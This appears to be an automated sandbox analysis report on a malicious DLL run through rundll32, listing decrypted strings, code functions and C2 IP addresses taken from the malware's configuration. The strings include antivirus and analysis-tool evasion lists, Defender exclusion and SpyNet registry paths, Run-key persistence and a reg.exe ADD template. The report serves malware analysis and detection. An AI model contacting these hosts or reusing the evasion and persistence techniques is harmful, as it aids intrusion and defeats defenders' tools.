Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_Bios
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: c:\hiberfil.sysss
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: /
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ByteFence.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: type=0x%04X
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: snxhk_border_mywnd
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ROOT\CIMV2
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: dwuser.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: https
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: fshoster32.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: kernelbase.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: regsvr32.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %s\system32\
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_Process
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: rundll32.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: LOCALAPPDATA
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: cmd.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: APPDATA
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: select
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: mcshield.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: advapi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ws2_32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .cfg
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_Product
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: WQL
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wininet.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: LastBootUpTime
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: urlmon.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Create
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_PnPEntity
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Initializing database...
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: winsta0\default
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .dat
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: WBJ_IGNORE
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: next
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wpcap.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: image/pjpeg
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: fmon.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: vbs
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aswhooka.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SysWOW64
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: mpr.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: image/gif
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: crypt32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ntdll.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: open
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SystemRoot
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: cscript.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: C:\INTERNAL\__empty
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_PhysicalMemory
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: image/jpeg
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: LocalLow
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: displayName
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: shlwapi.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CommandLine
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: kernel32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SubmitSamplesConsent
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: 1234567890
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wbj.go
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_DiskDrive
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: System32
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Name
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: WRSA.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: c:\\
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SpyNetReporting
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: FALSE
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aswhookx.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Packages
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: application/x-shockwave-flash
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: RepUx.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Winsta0
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: avp.exe;kavtray.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: root\SecurityCenter2
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: MsMpEng.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: userenv.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: csc_ui.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: \\.\pipe\
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: pstorec.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: NTUSER.DAT
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: from
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: netapi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: gdi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: setupapi.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: iphlpapi.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CrAmTray.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_ComputerSystem
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: user32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticuser.exe;SentinelAgent.exe;SentinelStaticuserScanner.exe;SentinelUI.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: \sf2.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: egui.exe;ekrn.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Software\Microsoft
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %S.%06d
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: bcrypt.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wtsapi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: shell32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: TRUE
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_Bios
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: c:\hiberfil.sysss
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: /
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ByteFence.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: type=0x%04X
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: snxhk_border_mywnd
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ROOT\CIMV2
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: dwuser.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: https
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: fshoster32.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: kernelbase.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: regsvr32.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %s\system32\
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_Process
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: rundll32.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: LOCALAPPDATA
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: cmd.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: APPDATA
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: select
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: mcshield.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: advapi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ws2_32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .cfg
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_Product
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: WQL
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wininet.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: LastBootUpTime
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: urlmon.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Create
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_PnPEntity
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Initializing database...
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: winsta0\default
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .dat
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: WBJ_IGNORE
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: next
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wpcap.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: image/pjpeg
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: fmon.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: vbs
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aswhooka.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SysWOW64
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: mpr.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: image/gif
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: crypt32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ntdll.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: open
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10035030 mv_get_random_seed,BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,mvpriv_open,_read,_close,mvpriv_open,_read,_close,clock,clock,mv_sha_init,mv_sha_update,mv_sha_final,mv_log,abort,	3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000C0B0 mv_cast5_crypt2,	3_2_1000C0B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000B0D0 mv_camellia_crypt,	3_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10013100 mv_encryption_init_info_alloc,mv_mallocz,mv_mallocz,mv_mallocz,mv_mallocz,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_calloc,	3_2_10013100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000C1B0 mv_cast5_crypt,	3_2_1000C1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100132D0 mv_encryption_init_info_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,	3_2_100132D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10002480 mv_aes_ctr_crypt,mv_aes_crypt,	3_2_10002480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10013480 mv_encryption_init_info_get_side_data,mv_encryption_init_info_alloc,mv_free,mv_free,mv_free,mv_free,mv_free,	3_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100084B0 mv_blowfish_crypt,mv_blowfish_crypt_ecb,mv_blowfish_crypt_ecb,	3_2_100084B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100364E0 mv_rc4_crypt,	3_2_100364E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10002523 mv_aes_crypt,	3_2_10002523
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001363B mv_encryption_init_info_alloc,	3_2_1001363B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000867B mv_blowfish_crypt_ecb,	3_2_1000867B

Source: F086.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: unknown

HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.6:49717 version: TLS 1.2

Source: F086.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_041B9DA8 FindFirstFileW,FindNextFileW,

18_2_041B9DA8

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 12.172.173.82:50001
Source: Malware configuration extractor	IPs: 178.175.187.254:443
Source: Malware configuration extractor	IPs: 65.95.141.84:2222
Source: Malware configuration extractor	IPs: 205.237.67.69:995
Source: Malware configuration extractor	IPs: 83.110.223.61:443
Source: Malware configuration extractor	IPs: 193.253.100.236:2222
Source: Malware configuration extractor	IPs: 27.0.48.233:443
Source: Malware configuration extractor	IPs: 102.159.188.125:443
Source: Malware configuration extractor	IPs: 71.38.155.217:443
Source: Malware configuration extractor	IPs: 58.186.75.42:443
Source: Malware configuration extractor	IPs: 76.178.148.107:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:2087
Source: Malware configuration extractor	IPs: 114.143.176.236:443
Source: Malware configuration extractor	IPs: 51.14.29.227:2222
Source: Malware configuration extractor	IPs: 59.28.84.65:443
Source: Malware configuration extractor	IPs: 173.88.135.179:443
Source: Malware configuration extractor	IPs: 103.144.201.56:2078
Source: Malware configuration extractor	IPs: 96.87.28.170:2222
Source: Malware configuration extractor	IPs: 105.186.128.181:995
Source: Malware configuration extractor	IPs: 176.142.207.63:443
Source: Malware configuration extractor	IPs: 151.62.238.176:443
Source: Malware configuration extractor	IPs: 12.172.173.82:32101
Source: Malware configuration extractor	IPs: 122.186.210.254:443
Source: Malware configuration extractor	IPs: 82.125.44.236:2222
Source: Malware configuration extractor	IPs: 84.108.200.161:443
